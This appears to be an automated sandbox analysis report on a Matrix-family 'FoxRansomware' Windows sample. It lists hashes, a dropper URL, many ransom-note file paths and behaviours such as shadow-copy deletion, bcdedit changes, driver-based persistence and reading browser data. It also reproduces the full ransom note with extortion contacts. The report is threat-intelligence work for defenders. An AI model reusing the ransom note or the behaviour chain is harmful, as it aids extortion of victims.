matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Resubmissions

03-04-2024 17:37

240403-v68g6sga2w 10

Analysis

max time kernel
149s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2024 17:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Size

1.2MB
MD5

1fa1b6d4b3ed867c1d4baffc77417611
SHA1

afb5e385f9cc8910d7a970b6c32b8d79295579da
SHA256

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53
SHA512

0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5
SSDEEP

24576:K/SA+2lraRrjSJR5ezmT1dM9bBkNIDreFqO:2Xl9Ife

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#FOX_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 09F971054C2D71EA\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 09F971054C2D71EA\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 HaIPlDDk\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

description	ioc	process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nb-no\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\rsod\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cs\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hy\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\lt\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\jfr\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Google\Chrome\Application\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\is\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\AugLoop\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-US\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f14\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\eu-es\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\it\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\it-it\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Office\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pl\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_filter\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

6788 bcdedit.exe
5988 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

148 4532 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

Mk0Uxuuz64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS Mk0Uxuuz64.exe

pid	process
6788	bcdedit.exe
5988	bcdedit.exe

flow	pid	process
148	4532	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	Mk0Uxuuz64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Mk0Uxuuz64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	Mk0Uxuuz64.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation wscript.exe
Executes dropped EXE 3 IoCs

Processes:

NWEyBzO5.exeMk0Uxuuz.exeMk0Uxuuz64.exe

pid process

3884 NWEyBzO5.exe
6896 Mk0Uxuuz.exe
5280 Mk0Uxuuz64.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exe

pid process

6468 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	wscript.exe

pid	process
3884	NWEyBzO5.exe
6896	Mk0Uxuuz.exe
5280	Mk0Uxuuz64.exe

pid	process
6468	takeown.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Mk0Uxuuz.exe	upx
behavioral10/memory/6896-2776-0x0000000000400000-0x0000000000477000-memory.dmp	upx
